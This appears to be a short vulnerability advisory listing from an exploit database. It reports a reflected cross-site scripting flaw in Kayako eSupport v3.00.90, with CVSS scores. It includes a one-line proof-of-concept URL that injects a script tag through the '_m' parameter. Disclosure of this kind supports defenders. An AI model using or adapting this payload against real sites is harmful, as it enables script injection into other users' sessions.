Kayako eSupport v3.00.90 Cross Site Scripting (XSS)

2007.05.12
Credit: Red_Casper
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Script: Kayako eSupport Version: 3.00.90 Explored By: Red_Casper [United Arab HaCkers] Proof: [Path]/index.php?_m="><script>alert(1);</script>


Vote for this issue:
50%
50%

Comment it here.

Copyright 2025, cxsecurity.com

 

Back to Top